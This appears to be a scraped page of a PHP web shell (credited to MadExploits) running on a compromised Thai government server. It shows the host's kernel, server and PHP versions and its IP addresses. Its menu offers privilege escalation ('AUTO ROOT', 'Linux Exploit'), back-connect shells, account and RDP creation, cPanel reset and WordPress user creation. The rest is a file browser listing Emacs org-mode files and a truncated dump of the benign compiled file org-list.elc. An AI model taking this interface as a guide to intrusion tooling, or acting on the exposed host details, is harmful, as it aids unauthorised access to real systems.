Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
org /
[ HOME SHELL ]
Name
Size
Permission
Action
org-agenda.elc
214.7
KB
-rw-r--r--
org-archive.elc
11.75
KB
-rw-r--r--
org-attach.elc
14.21
KB
-rw-r--r--
org-bbdb.elc
7.37
KB
-rw-r--r--
org-bibtex.elc
4.13
KB
-rw-r--r--
org-clock.elc
35.05
KB
-rw-r--r--
org-colview.elc
41.45
KB
-rw-r--r--
org-compat.elc
7.48
KB
-rw-r--r--
org-exp.elc
149.66
KB
-rw-r--r--
org-export-latex.elc
44.23
KB
-rw-r--r--
org-faces.elc
20.18
KB
-rw-r--r--
org-footnote.elc
13.77
KB
-rw-r--r--
org-gnus.elc
5.74
KB
-rw-r--r--
org-id.elc
16.92
KB
-rw-r--r--
org-info.elc
1.68
KB
-rw-r--r--
org-install.elc
635
B
-rw-r--r--
org-irc.elc
5.89
KB
-rw-r--r--
org-jsinfo.elc
5.39
KB
-rw-r--r--
org-list.elc
32.5
KB
-rw-r--r--
org-mac-message.elc
2.27
KB
-rw-r--r--
org-macs.elc
7.83
KB
-rw-r--r--
org-mew.elc
2.92
KB
-rw-r--r--
org-mhe.elc
5.16
KB
-rw-r--r--
org-mouse.elc
32.83
KB
-rw-r--r--
org-plot.elc
10.28
KB
-rw-r--r--
org-publish.elc
20.43
KB
-rw-r--r--
org-remember.elc
31.7
KB
-rw-r--r--
org-rmail.elc
2.82
KB
-rw-r--r--
org-table.elc
136.62
KB
-rw-r--r--
org-timer.elc
7.61
KB
-rw-r--r--
org-vm.elc
2.91
KB
-rw-r--r--
org-w3m.elc
3.88
KB
-rw-r--r--
org-wl.elc
2.82
KB
-rw-r--r--
org.elc
505.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : org-list.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:47 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/org/org-list.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`org-list.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\300\302!\210\303\304\305\306\307\310\311\312&\207" [require org-macs org-compat custom-declare-group org-plain-lists nil "Options concerning plain lists in Org-mode." :tag "Org Plain lists" :group org-structure] 8) #@369 Non-nil means, include plain lists into visibility cycling. This means that during cycling, plain list items will *temporarily* be interpreted as outline headlines with a level given by 1000+i where i is the indentation of the bullet. In all other operations, plain list items are not seen as headlines. For example, you cannot assign a TODO keyword to such an item. (custom-declare-variable 'org-cycle-include-plain-lists 'nil '(#$ . 854) :group 'org-plain-lists :type 'boolean) #@293 The character that makes a line with leading number an ordered list item. Valid values are ?. and ?). To get both terminators, use t. While ?. may look nicer, it creates the danger that a line with leading number may be incorrectly interpreted as an item. ?) therefore is the safe choice. (custom-declare-variable 'org-plain-list-ordered-item-terminator 't '(#$ . 1342) :group 'org-plain-lists :type '(choice (const :tag "dot like in \"2.\"" 46) (const :tag "paren like in \"2)\"" 41) (const :tab "both" t))) #@385 A regular expression matching bullets that should have 2 spaces after them. When nil, no bullet will have two spaces after them. When a string, it will be used as a regular expression. When the bullet type of a list is changed, the new bullet type will be matched against this regexp. If it matches, there will be two spaces instead of one after the bullet in each item of he list. (custom-declare-variable 'org-list-two-spaces-after-bullet-regexp 'nil '(#$ . 1861) :group 'org-plain-list :type '(choice (const :tag "never" nil) (regexp))) #@112 Non-nil means, an empty line ends all plain list levels. When nil, empty lines are part of the preceding item. (custom-declare-variable 'org-empty-line-terminates-plain-lists 'nil '(#$ . 2410) :group 'org-plain-lists :type 'boolean) #@245 Non-nil means, automatically renumber ordered plain lists. Renumbering happens when the sequence have been changed with \[org-shiftmetaup] or \[org-shiftmetadown]. After other editing commands, use \[org-ctrl-c-ctrl-c] to trigger renumbering. (custom-declare-variable 'org-auto-renumber-ordered-lists 't '(#$ . 2650) :group 'org-plain-lists :type 'boolean) #@241 Non-nil means, update checkbox statistics after insert and toggle. When this is set, checkbox statistics is updated each time you either insert a new checkbox with \[org-insert-todo-heading] or toggle a checkbox with \[org-ctrl-c-ctrl-c\]. (custom-declare-variable 'org-provide-checkbox-statistics 't '(#$ . 3015) :group 'org-plain-lists :type 'boolean) #@149 Maximum indentation for the second line of a description list. When the indentation would be larger than this, it will become 5 characters instead. (custom-declare-variable 'org-description-max-indent '20 '(#$ . 3376) :group 'org-plain-lists :type 'integer) (byte-code "\301B\302\301!\204 \303\301\304\"\210\301\207" [current-load-list org-list-beginning-re default-boundp set-default "^\\([ ]*\\)\\([-+*]\\|[0-9]+[.)]\\) +\\(.*\\)$"] 3) #@165 Templates for radio lists in different major modes. All occurrences of %n in a template will be replaced with the name of the list, obtained by prompting the user. (custom-declare-variable 'org-list-radio-list-templates ''((latex-mode "% BEGIN RECEIVE ORGLST %n\n% END RECEIVE ORGLST %n\n\\begin{comment}\n#+ORGLST: SEND %n org-list-to-latex\n| | |\n\\end{comment}\n") (texinfo-mode "@c BEGIN RECEIVE ORGLST %n\n@c END RECEIVE ORGLST %n\n@ignore\n#+ORGLST: SEND %n org-list-to-texinfo\n| | |\n@end ignore\n") (html-mode "<!-- BEGIN RECEIVE ORGLST %n -->\n<!-- END RECEIVE ORGLST %n -->\n<!--\n#+ORGLST: SEND %n org-list-to-html\n| | |\n-->\n")) '(#$ . 3825) :group 'org-plain-lists :type '(repeat (list (symbol :tag "Major mode") (string :tag "Format")))) #@52 Is point in a line starting a hand-formatted item? (defalias 'org-at-item-p #[nil "\212\302 b\210\303 \304=\203 \305\202) \306U\203 \307\202) \310U\203&